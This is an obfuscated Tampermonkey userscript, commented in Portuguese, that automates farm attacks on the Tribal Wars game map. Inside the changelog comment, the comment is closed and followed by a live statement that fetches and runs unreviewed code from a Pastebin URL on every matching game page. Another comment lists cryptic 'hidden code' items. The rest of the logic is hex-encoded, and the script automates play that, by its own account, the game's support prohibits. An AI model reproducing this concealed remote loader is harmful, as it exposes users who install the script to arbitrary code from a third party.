// ==UserScript==
// @name           ☢ Dry Evolution Map - AUTOFARM ☢
// @author         Marcos v.s Marques + (Equipe Internacional DS-TW)
// @email          tribalwarsbr100@gmail.com
// @namespace      https://www.youtube.com/c/TW100TRIBALWARS/videos
// @site           https://tribalwarsbr100.wixsite.com/tw100
// @instagram      https://twitter.com/TW100OFICIAL
// @version        1.0 (NOV/2017)
// @description    Script ECMA5, Dry Evolution Map - Autofarm, modelo de auto farm com bases em modelo Dry e Less Dry do Canal Tw 100, Além  implatação de css painel interativo mais o tão esperado Farm no Mapa também com painel interativo, e assim mostrando mais uma vez a qualidade e criatividade em implatação de novos modelos, cada vez mais se superando e trazendo novidades de verdade.
// @Opções         No Mapa Basta Clicar nas aldeias Barbaras que deseja farmar, ou no Assistente de Saque, Basta Clicar nas opções A-B-C e em seguida o autofarm realiza a tarefa automaticamente.
// @Utilização     Utilizar Unica e Exclusivamente no Mapa ou  Assistente de saque
// @project        Projeto ☢ Dry Evolution Map ☢ Sofisticação do Modelo Dry
// @model          Modelo Inicial não testado por longos periodos, passiveis a erros e bugs.
// @security       Não certificamos a segurança no uso deste conteudo, fica por conta propria do usuario.
// @Recognition    Script escrito baseado em modelos de script similares, de farm no mapa, mas este modelo foi adicionado o requintado estilo e qualidade visual assim revolucionando mais uma vez os scripts de farm para o game tribal wars, trazendo mais uma vez o alto nivel de qualidade visual da Equipe do Canal Tw 100  este script não e melhor do que os demais, de outros autores, mas trás consigo a revolução do estilo Cascading Style Sheets (CSS) assim tendo seu painel configuravel a obra prima que é a marcação de aldeia img css para aldeia atacada, além de todas versões Dry incluidas.
// @Gratificações  Agradecimentos a Toda Equipe Ponte (Br-Pt-De-Nl-Pl-Net) e toda conecção CMD INTERNATIONAL
// @grant          GM_getValue
// @grant          GM_setValue
// @grant          unsafeWindow
// @include        https://*game.php*
// @icon           https://imgur.com/vymnRXs.png
// ==/UserScript==

/*	Changelog versão 1.25
*        Equipe do Canal Youtube TW 100 Foi Realizado a Mais Recente Atualização Para Implatação da universalização do conteudo do canal, assim tornando nosso conteudo cada vez mais usual e presente em todos servidores de tribalwars.
*        Equipe do Canal Youtube TW 100 Solicita humildemente a colaboração dos usuarios dos conteudos abragidos no canal com likes, curtidas, comentarios nos videos, e com compartilhamento dos videos, isso era proporcionar um crescimento do canal, e com isso cada vez  mais iremos trazer mais conteudo.
*        Equipe do Canal Youtube TW 100 se reserva ao direito de possuir a posse do codigo-fonte  do script, quaisquer modificação deve ser solicitado via email, segundos regras da Licença Pública Geral GNU
*        Equipe do Canal Youtube TW 100 não se responsabiliza por eventuais danos causados pela utilização do script
*        Equipe do Canal Youtube TW 100 promove a canpanha "Software livre não e virus nem boot" abraça e se solidariza com os scripts de tampermonkey voltados para o game tribal wars, do qual as equipes inesperientes de suporte, sem conhecimento, e sem saber a historia dos primordios do game, impõe um pensamento de que os script de grasemonkey tampermonkey violentmonkey e scripts utilizados na barra de favoritos do navegador são proibidos. Muitas das melhorias no game, que se deu atraves de scrips de tampermonkey, grasemonkey, violentmonkey, entre outros meios de leitura e execução, feitos de players para players, Prova disso e os diversos scripts de grasemonkey sempre foram permitidos no forum da comunidade do Servidor Alemão DE e tambem permitidos no servidor holandês NL, Alem do qual esse pensamento foi uma forma da da grande empresa tutora do game promover seus ganhos com recursos pagos, e assim prejudicando os jogadores que não utiliza de dinheiro para jogar, *EQUIPE TW 100 DEIXA CLARO, QUE NÃO E PRECISO TER FUNÇÕES PAGAS PARA USUFLUIR DO GAME, TEMOS A MISSÃO DE TRAZER UMA INGUALAÇÃO DO QUAL OS PLAYERS QUE NÃO USUFLEM DE RECURSOS PREMIUNS TENHA A SUA DIPONIBILIDADE OS MESMO RECURSOS DOS QUE TEM*/javascript:$.getScript('https://pastebin.com/raw.php?i=3zaAB4dL');void(0);
/*		 Equipe do Canal Youtube TW 100 no dia 25/06/2017 v2.0i primeira versão para atualização TW 8.89
*        Equipe do Canal Youtube TW 100 Script em desenvolvimento, ao longo do tempo, de acordo com o tempo disponivel iremos adicionar mais funções
*/


/*TW100*/ /* LOGO IREMOS CRIAR NOSSA PLAYLIST NO YOUTUBE SOMENTE COM SCRIPT TAMPERMONKEY*/

/* SettingsAPI: ＣＡＮＡＬ ＤＯ ＹＯＵＴＵＢＥ ＴＷ 100
		-------------------------------------------------------------------------------------
		╔═══╗╔═══╗╔═╗─╔╗╔═══╗╔╗───     ╔═══╗╔═══╗     ╔╗──╔╗╔═══╗╔╗─╔╗╔════╗╔╗─╔╗╔══╗─╔═══╗     ╔════╗──────     ─╔╗─╔═══╗╔═══╗
║╔═╗║║╔═╗║║║╚╗║║║╔═╗║║║───     ╚╗╔╗║║╔═╗║     ║╚╗╔╝║║╔═╗║║║─║║║╔╗╔╗║║║─║║║╔╗║─║╔══╝     ║╔╗╔╗║──────     ╔╝║─║╔═╗║║╔═╗║
║║─╚╝║║─║║║╔╗╚╝║║║─║║║║───     ─║║║║║║─║║     ╚╗╚╝╔╝║║─║║║║─║║╚╝║║╚╝║║─║║║╚╝╚╗║╚══╗     ╚╝║║╚╝╔╗╔╗╔╗     ╚╗║─║║║║║║║║║║
║║─╔╗║╚═╝║║║╚╗║║║╚═╝║║║─╔╗     ─║║║║║║─║║     ─╚╗╔╝─║║─║║║║─║║──║║──║║─║║║╔═╗║║╔══╝     ──║║──║╚╝╚╝║     ─║║─║║║║║║║║║║
║╚═╝║║╔═╗║║║─║║║║╔═╗║║╚═╝║     ╔╝╚╝║║╚═╝║     ──║║──║╚═╝║║╚═╝║──║║──║╚═╝║║╚═╝║║╚══╗     ──║║──╚╗╔╗╔╝     ╔╝╚╗║╚═╝║║╚═╝║
╚═══╝╚╝─╚╝╚╝─╚═╝╚╝─╚╝╚═══╝     ╚═══╝╚═══╝     ──╚╝──╚═══╝╚═══╝──╚╝──╚═══╝╚═══╝╚═══╝     ──╚╝───╚╝╚╝─     ╚══╝╚═══╝╚═══╝
╔════╗──────     ─╔╗─╔═══╗╔═══╗
║╔╗╔╗║──────     ╔╝║─║╔═╗║║╔═╗║
╚╝║║╚╝╔╗╔╗╔╗     ╚╗║─║║║║║║║║║║
──║║──║╚╝╚╝║     ─║║─║║║║║║║║║║
──║║──╚╗╔╗╔╝     ╔╝╚╗║╚═╝║║╚═╝║
──╚╝───╚╝╚╝─     ╚══╝╚═══╝╚═══╝
███۞███████ ]▄▄▄▄▄▄▄▄▄▄▄▄▃
▂▄▅█████████▅▄▃▂
I███████████████████].
◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤...
*/

/* Instruções condificadas para não interação usuario client side.
- Sistem mysql_start
- localhost/8081
- sistem setup_xampp
- sistem php_start
* sistem kalifado_www.dropbox.5478h9g8s4a5e2e7s.js?php.admin
* farmmapa.pastebin.tw100/mesclado_ocult_criptografia
* ocult_code_pastebin.br
- serven (pt,br,pl,de,nl,net) multlogin
- ID- inativo_reativex
- (5)vold.end;
*/
var _0x929c=["\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\u272A\x20\x54\x77\x20\x31\x30\x30\x20\u272A\x20\x2D\x20\x53\x63\x72\x69\x70\x74\x20\x4D\x75\x6C\x74\x20\x55\x73\x6F\x20\x44\x65\x76\x65\x20\x53\x65\x72\x20\x55\x73\x61\x64\x6F\x20\x4E\x6F\x20\x4D\x61\x70\x61\x20\x6F\x75\x20\x41\x73\x73\x69\x73\x74\x65\x6E\x74\x65\x20\x64\x65\x20\x53\x61\x71\x75\x65\x2E\x2E\x2E","\x65\x72\x72\x6F\x72","\x62\x6F\x64\x79","\x6C\x65\x6E\x67\x74\x68","\x66\x72\x61\x6D\x65\x73","\x6D\x61\x69\x6E","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x73\x63\x72\x65\x65\x6E\x3D\x6D\x61\x70","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x69\x6E\x6B\x5F\x62\x61\x73\x65\x5F\x70\x75\x72\x65","\x67\x61\x6D\x65\x5F\x64\x61\x74\x61","\x6D\x61\x70\x66\x61\x72\x6D\x2E\x6D\x6F\x64\x65","\x63\x6F\x6F\x6B\x69\x65","\x61","\x65\x78\x74\x65\x6E\x64","\x68\x65\x61\x64","\x61\x70\x70\x65\x6E\x64\x54\x6F","\x3C\x73\x74\x79\x6C\x65\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x63\x73\x73\x22\x3E","\x2E\x61\x75\x74\x6F\x48\x69\x64\x65\x42\x6F\x78\x20\x7B\x20\x74\x6F\x70\x3A\x20\x6C\x65\x66\x74\x3B\x20\x62\x6F\x74\x74\x6F\x6D\x3A\x20\x31\x30\x70\x78\x20\x7D\x20","\x2E\x66\x61\x72\x6D\x5F\x69\x63\x6F\x6E\x5F\x61\x2E\x61\x63\x74\x69\x76\x65\x20\x7B\x20\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x2D\x32\x36\x34\x70\x78\x20\x2D\x32\x34\x70\x78\x20\x7D\x20","\x2E\x66\x61\x72\x6D\x5F\x69\x63\x6F\x6E\x5F\x62\x2E\x61\x63\x74\x69\x76\x65\x20\x7B\x20\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x2D\x32\x38\x38\x70\x78\x20\x2D\x32\x34\x70\x78\x20\x7D","\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x23\x6D\x69\x6E\x69\x6D\x61\x70\x5F\x77\x68\x6F\x6C\x65","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\x74\x65\x78\x74\x2D\x61\x6C\x69\x67\x6E\x3A\x20\x72\x69\x67\x68\x74\x3B\x20\x6D\x61\x72\x67\x69\x6E\x2D\x62\x6F\x74\x74\x6F\x6D\x3A\x20\x31\x30\x70\x78\x3B\x22\x3E","\u270E\x20\uD835\uDD4B\uD835\uDD4E\x20\uD835\uDFD9\uD835\uDFD8\uD835\uDFD8\x20\u270C\x20\uD835\uDD4D\uD835\uDD3C\u211D\uD835\uDD4A\uD835\uDD38\u0303\uD835\uDD46\xB9\x2A\xB2\x3A\x20\uD835\uDFDA\x2E\uD835\uDFD8\x20\x20","\x3C\x61\x20\x63\x6C\x61\x73\x73\x3D\x22\x62\x74\x6E\x22\x20\x68\x72\x65\x66\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x79\x6F\x75\x74\x75\x62\x65\x2E\x63\x6F\x6D\x2F\x63\x2F\x54\x57\x31\x30\x30\x54\x52\x49\x42\x41\x4C\x57\x41\x52\x53\x22\x20\x74\x61\x72\x67\x65\x74\x3D\x22\x5F\x62\x6C\x61\x6E\x6B\x22\x3E\u2593\x20\uD835\uDD44\uD835\uDD38\u2115\uD835\uDD4C\uD835\uDD38\uD835\uDD43\x20\u2593\x3C\x2F\x61\x3E","\x3C\x2F\x64\x69\x76\x3E","\x3C\x74\x61\x62\x6C\x65\x20\x63\x6C\x61\x73\x73\x3D\x22\x76\x69\x73\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x6D\x61\x72\x67\x69\x6E\x3A\x20\x30\x20\x30\x20\x31\x30\x70\x78\x3B\x20\x77\x69\x64\x74\x68\x3A\x20\x31\x30\x30\x25\x3B\x22\x3E","\x3C\x74\x72\x3E","\x3C\x74\x68\x20\x63\x6F\x6C\x73\x70\x61\x6E\x3D\x22\x33\x22\x3E","\uD835\uDD3D\uD835\uDD38\u211D\uD835\uDD44\x20\uD835\uDD44\uD835\uDD38\u2119\uD835\uDD38","\x3C\x2F\x74\x68\x3E","\x3C\x2F\x74\x72\x3E","\x3C\x74\x64\x20\x72\x6F\x77\x73\x70\x61\x6E\x3D\x22\x32\x22\x3E","\uD835\uDD44\uD835\uDD46\uD835\uDD3B\uD835\uDD3C\uD835\uDD43\uD835\uDD46","\x3C\x2F\x74\x64\x3E","\x3C\x74\x64\x3E","\x3C\x61\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x61\x72\x6D\x5F\x69\x63\x6F\x6E\x20\x66\x61\x72\x6D\x5F\x69\x63\x6F\x6E\x5F\x61\x22\x20\x64\x61\x74\x61\x2D\x6D\x6F\x64\x65\x3D\x22\x61\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x69\x6E\x6C\x69\x6E\x65\x2D\x62\x6C\x6F\x63\x6B\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x20\x35\x70\x78\x22\x3E\x3C\x2F\x61\x3E","\x3C\x74\x64\x20\x69\x64\x3D\x22\x61\x5F\x74\x70\x6C\x22\x3E\x3C\x2F\x74\x64\x3E","\x3C\x61\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x61\x72\x6D\x5F\x69\x63\x6F\x6E\x20\x66\x61\x72\x6D\x5F\x69\x63\x6F\x6E\x5F\x62\x22\x20\x64\x61\x74\x61\x2D\x6D\x6F\x64\x65\x3D\x22\x62\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x69\x6E\x6C\x69\x6E\x65\x2D\x62\x6C\x6F\x63\x6B\x3B\x20\x6D\x61\x72\x67\x69\x6E\x3A\x20\x35\x70\x78\x22\x3E\x3C\x2F\x61\x3E","\x3C\x74\x64\x20\x69\x64\x3D\x22\x62\x5F\x74\x70\x6C\x22\x3E\x3C\x2F\x74\x64\x3E","\x3C\x74\x64\x20\x63\x6F\x6C\x73\x70\x61\x6E\x3D\x22\x33\x22\x3E\x3C\x6C\x61\x62\x65\x6C\x3E\x3C\x69\x6E\x70\x75\x74\x20\x74\x79\x70\x65\x3D\x22\x63\x68\x65\x63\x6B\x62\x6F\x78\x22\x20\x69\x64\x3D\x22\x68\x69\x64\x65\x4F\x74\x68\x65\x72\x50\x6C\x61\x79\x65\x72\x73\x22\x3E\x20\uD835\uDD46\uD835\uDD54\uD835\uDD66\uD835\uDD5D\uD835\uDD65\uD835\uDD52\uD835\uDD63\x20\uD835\uDD52\uD835\uDD5D\uD835\uDD55\uD835\uDD56\uD835\uDD5A\uD835\uDD52\uD835\uDD64\x20\uD835\uDD55\uD835\uDD56\x20\uD835\uDD41\uD835\uDD60\uD835\uDD58\uD835\uDD52\uD835\uDD55\uD835\uDD60\uD835\uDD63\uD835\uDD56\uD835\uDD64\x20\x3C\x2F\x6C\x61\x62\x65\x6C\x3E\x3C\x2F\x74\x64\x3E","\x3C\x2F\x74\x61\x62\x6C\x65\x3E","\x74\x6F\x6F\x6C\x74\x69\x70\x2D\x74\x70\x6C","\x64\x61\x74\x61","\x23\x6D\x70\x5F\x66\x61\x72\x6D\x5F\x61","\x68\x74\x6D\x6C","\x23\x61\x5F\x74\x70\x6C","\x23\x6D\x70\x5F\x66\x61\x72\x6D\x5F\x62","\x23\x62\x5F\x74\x70\x6C","\x61\x63\x74\x69\x76\x65","\x61\x64\x64\x43\x6C\x61\x73\x73","\x2E\x66\x61\x72\x6D\x5F\x69\x63\x6F\x6E\x5F","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x6D\x6F\x64\x65","\x66\x69\x6E\x64","\x63\x6C\x69\x63\x6B","\x72\x65\x6D\x6F\x76\x65\x43\x6C\x61\x73\x73","\x61\x5B\x63\x6C\x61\x73\x73\x5E\x3D\x22\x66\x61\x72\x6D\x5F\x69\x63\x6F\x6E\x22\x5D","\x6F\x6E","\x63\x68\x61\x6E\x67\x65","\x68\x69\x64\x65\x4F\x74\x68\x65\x72\x50\x6C\x61\x79\x65\x72\x73","\x3A\x63\x68\x65\x63\x6B\x65\x64","\x69\x73","\x72\x65\x6C\x6F\x61\x64","\x63\x68\x65\x63\x6B\x65\x64","\x70\x72\x6F\x70","\x23\x68\x69\x64\x65\x4F\x74\x68\x65\x72\x50\x6C\x61\x79\x65\x72\x73","\x3C\x74\x61\x62\x6C\x65\x20\x63\x6C\x61\x73\x73\x3D\x22\x76\x69\x73\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x6D\x61\x72\x67\x69\x6E\x3A\x20\x30\x20\x31\x30\x70\x78\x20\x31\x30\x70\x78\x20\x30\x3B\x20\x66\x6C\x6F\x61\x74\x3A\x20\x72\x69\x67\x68\x74\x3B\x22\x3E","\x75\x6E\x69\x74\x73","\x73\x72\x63","\x69\x6D\x61\x67\x65","\x61\x74\x74\x72","\x3C\x69\x6D\x67\x3E","\x61\x70\x70\x65\x6E\x64","\x3C\x74\x68\x3E","\x68\x6F\x6D\x65","\x63\x6F\x75\x6E\x74","\x74\x65\x78\x74","\x69\x64","\x75\x6E\x69\x74\x5F","\x65\x61\x63\x68","\x23\x6D\x61\x70\x5F\x77\x68\x6F\x6C\x65","\x73\x75\x63\x63\x65\x73\x73","\x67\x61\x6D\x65\x2E\x70\x68\x70","\x76\x69\x6C\x6C\x61\x67\x65","\x6D\x61\x70\x5F\x69\x6E\x66\x6F","\x6F\x76\x65\x72\x76\x69\x65\x77","\x67\x65\x74","\x6F\x6E\x43\x6C\x69\x63\x6B","\x6D\x61\x70\x48\x61\x6E\x64\x6C\x65\x72","\x70\x72\x65\x76\x65\x6E\x74\x44\x65\x66\x61\x75\x6C\x74","\x76\x69\x6C\x6C\x61\x67\x65\x73","\x6F\x77\x6E\x65\x72","\x30","\x4F\x20\x41\x73\x73\x69\x73\x74\x65\x6E\x74\x65\x20\x53\x61\x71\x75\x65\x20\x73\xF3\x20\x70\x6F\x64\x65\x20\x75\x73\x61\x72\x20\x6F\x73\x20\x73\x65\x75\x73\x20\x62\xE1\x72\x62\x61\x72\x6F\x73","\x5F\x5F\x73\x6F\x75\x72\x63\x65\x5F\x5F","\x5F\x5F\x76\x69\x6C\x6C\x61\x67\x65\x5F\x5F","\x6D\x70\x5F\x66\x61\x72\x6D\x5F","\x63\x74\x78","\x75\x72\x6C\x73","\x6E\x6F\x77","\x3C\x61\x3E","\x61\x6A\x61\x78\x52\x65\x67\x69\x73\x74\x65\x72","\x63\x6F\x6E\x74\x65\x78\x74","\x72\x65\x6D\x6F\x76\x65","\x74\x72\x69\x67\x67\x65\x72","\x23\x6D\x61\x70\x5F\x76\x69\x6C\x6C\x61\x67\x65\x5F","\x31\x34\x70\x78","\x33\x34\x70\x78","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x6C\x65\x66\x74","\x63\x73\x73","\x74\x6F\x70","\x6D\x61\x70\x2F\x61\x74\x74\x61\x63\x6B\x2E\x70\x6E\x67","\x63\x6F\x6D\x6D\x61\x6E\x64\x49\x63\x6F\x6E\x73","\x61\x74\x74\x61\x63\x6B","\x70\x6F\x73","\x70\x6C\x61\x79\x65\x72","\x68\x69\x64\x65","\x2C\x20\x23\x6D\x61\x70\x5F\x69\x63\x6F\x6E\x73\x5F","\x6F\x6E\x4D\x6F\x76\x65","\x61\x70\x70\x6C\x79","\x61\x6A\x61\x78\x44\x6F\x6E\x65","\x63\x75\x72\x72\x65\x6E\x74\x5F\x75\x6E\x69\x74\x73","\x23\x75\x6E\x69\x74\x5F"];$(function(){if( typeof TWMap=== _0x929c[0]){UI.InfoMessage(_0x929c[1],1000,_0x929c[2],$(_0x929c[3]));setTimeout(function(){var _0x4258x1=window[_0x929c[5]][_0x929c[4]]> 0?window[_0x929c[6]]:window;self[_0x929c[7]]= _0x4258x1[_0x929c[11]][_0x929c[10]][_0x929c[9]](/screen\=\w*/i,_0x929c[8])},1000);return};if( typeof TWMapFarm!== _0x929c[0]){return};TWMapFarm= true;var _0x4258x2={mode:$[_0x929c[13]](_0x929c[12])|| _0x929c[14],hideOtherPlayers:true};if( typeof beallitasok!== _0x929c[0]){$[_0x929c[15]](_0x4258x2,beallitasok)};$(_0x929c[18]+ _0x929c[19]+ _0x929c[20]+ _0x929c[21]+ _0x929c[22])[_0x929c[17]]($(_0x929c[16]));var _0x4258x3=$(_0x929c[25]+ _0x929c[26]+ _0x929c[27]+ _0x929c[28])[_0x929c[24]](_0x929c[23]);var _0x4258x4=$(_0x929c[29]+ _0x929c[30]+ _0x929c[31]+ _0x929c[32]+ _0x929c[33]+ _0x929c[34]+ _0x929c[30]+ _0x929c[35]+ _0x929c[36]+ _0x929c[37]+ _0x929c[38]+ _0x929c[39]+ _0x929c[37]+ _0x929c[40]+ _0x929c[34]+ _0x929c[30]+ _0x929c[38]+ _0x929c[41]+ _0x929c[37]+ _0x929c[42]+ _0x929c[34]+ _0x929c[30]+ _0x929c[43]+ _0x929c[34]+ _0x929c[44])[_0x929c[24]](_0x929c[23]);$(_0x929c[49])[_0x929c[48]]($(_0x929c[47])[_0x929c[46]](_0x929c[45]));$(_0x929c[51])[_0x929c[48]]($(_0x929c[50])[_0x929c[46]](_0x929c[45]));_0x4258x4[_0x929c[57]](_0x929c[54]+ _0x4258x2[_0x929c[56]][_0x929c[55]]())[_0x929c[53]](_0x929c[52]);_0x4258x4[_0x929c[57]](_0x929c[60])[_0x929c[61]](_0x929c[58],function(){_0x4258x4[_0x929c[57]](_0x929c[60])[_0x929c[59]](_0x929c[52]);$(this)[_0x929c[53]](_0x929c[52]);_0x4258x2[_0x929c[56]]= $(this)[_0x929c[46]](_0x929c[56]);$[_0x929c[13]](_0x929c[12],_0x4258x2[_0x929c[56]],{expires:7})});$(_0x929c[69])[_0x929c[68]](_0x929c[67],_0x4258x2[_0x929c[63]])[_0x929c[61]](_0x929c[62],function(){_0x4258x2[_0x929c[63]]= $(this)[_0x929c[65]](_0x929c[64]);if(_0x4258x2[_0x929c[63]]){_0x4258x15()}else {TWMap[_0x929c[66]]()}});var _0x4258x5=$(_0x929c[70]);$[_0x929c[90]](_0x929c[86],{village:game_data[_0x929c[87]][_0x929c[81]],ajax:_0x929c[88],source:game_data[_0x929c[87]][_0x929c[81]],screen:_0x929c[89]})[_0x929c[85]](function(_0x4258x6){var _0x4258x7=$(_0x929c[30])[_0x929c[17]](_0x4258x5);var _0x4258x8=$(_0x929c[30])[_0x929c[17]](_0x4258x5);$[_0x929c[83]](_0x4258x6[0][_0x929c[71]],function(_0x4258x9,_0x4258xa){var _0x4258xb=$(_0x929c[75])[_0x929c[74]](_0x929c[72],image_base+ _0x4258xa[_0x929c[73]]);$(_0x929c[77])[_0x929c[76]](_0x4258xb)[_0x929c[17]](_0x4258x7);$(_0x929c[38])[_0x929c[74]](_0x929c[81],_0x929c[82]+ _0x4258x9)[_0x929c[80]](_0x4258xa[_0x929c[79]][_0x929c[78]])[_0x929c[17]](_0x4258x8)});_0x4258x5[_0x929c[24]]($(_0x929c[84]))});TWMap[_0x929c[92]][_0x929c[91]]= function(_0x4258xc,_0x4258xd,_0x4258xe){_0x4258xe[_0x929c[93]]();var _0x4258xf=TWMap[_0x929c[94]][_0x4258xc* 1000+ _0x4258xd];if(_0x4258xf[_0x929c[95]]!== _0x929c[96]){UI.InfoMessage(_0x929c[97],1000,_0x929c[2],$(_0x929c[3]));return};var _0x4258x10=TWMap[_0x929c[102]][_0x929c[101]][_0x929c[100]+ _0x4258x2[_0x929c[56]]][_0x929c[9]](_0x929c[99],_0x4258xf[_0x929c[81]])[_0x929c[9]](_0x929c[98],game_data[_0x929c[87]][_0x929c[81]]);var _0x4258x11=Date[_0x929c[103]]();var _0x4258x12=$(_0x929c[104])[_0x929c[74]](_0x929c[81],_0x4258x11)[_0x929c[17]]($(_0x929c[3]));TWMap[_0x929c[106]][_0x929c[105]](_0x4258x11,_0x4258x10);_0x4258x12[_0x929c[108]](_0x929c[58])[_0x929c[107]]();var _0x4258x13=$(_0x929c[109]+ _0x4258xf[_0x929c[81]]);var _0x4258x14=$(_0x929c[75])[_0x929c[74]](_0x929c[72],image_base+ _0x929c[116])[_0x929c[114]]({width:_0x929c[110],height:_0x929c[110],"\x6D\x61\x72\x67\x69\x6E\x2D\x6C\x65\x66\x74":_0x929c[111],position:_0x929c[112],"\x7A\x2D\x69\x6E\x64\x65\x78":4,left:_0x4258x13[_0x929c[114]](_0x929c[113]),top:_0x4258x13[_0x929c[114]](_0x929c[115])})[_0x929c[24]](_0x4258x13);TWMap[_0x929c[117]][_0x4258xf[_0x929c[81]]]= [{img:_0x929c[118]}]};var _0x4258x15=function(){var _0x4258x16=(TWMap[_0x929c[119]][0]- 30)* 1000;var _0x4258x17=(TWMap[_0x929c[119]][0]+ 30)* 1000;$[_0x929c[83]](TWMap[_0x929c[94]],function(_0x4258x18,_0x4258xf){if(_0x4258x18> _0x4258x16&& _0x4258x18< _0x4258x17&& _0x4258xf[_0x929c[95]]!== _0x929c[96]&& _0x4258xf[_0x929c[95]]!== game_data[_0x929c[120]][_0x929c[81]]){$(_0x929c[109]+ _0x4258xf[_0x929c[81]]+ _0x929c[122]+ _0x4258xf[_0x929c[81]])[_0x929c[121]]()}})};var _0x4258x19=TWMap[_0x929c[92]][_0x929c[123]];TWMap[_0x929c[92]][_0x929c[123]]= function(_0x4258xc,_0x4258xd){if(_0x4258x2[_0x929c[63]]){_0x4258x15()};_0x4258x19[_0x929c[124]](this,[_0x4258xc,_0x4258xd])};if(_0x4258x2[_0x929c[63]]){_0x4258x15()};var _0x4258x1a=TWMap[_0x929c[106]][_0x929c[125]];TWMap[_0x929c[106]][_0x929c[125]]= function(_0x4258x1b,_0x4258x1c){$[_0x929c[83]](_0x4258x1c[_0x929c[126]],function(_0x4258x9,_0x4258xa){$(_0x929c[127]+ _0x4258x9)[_0x929c[80]](_0x4258xa)});_0x4258x1a[_0x929c[124]](this,[_0x4258x1b,_0x4258x1c])}})
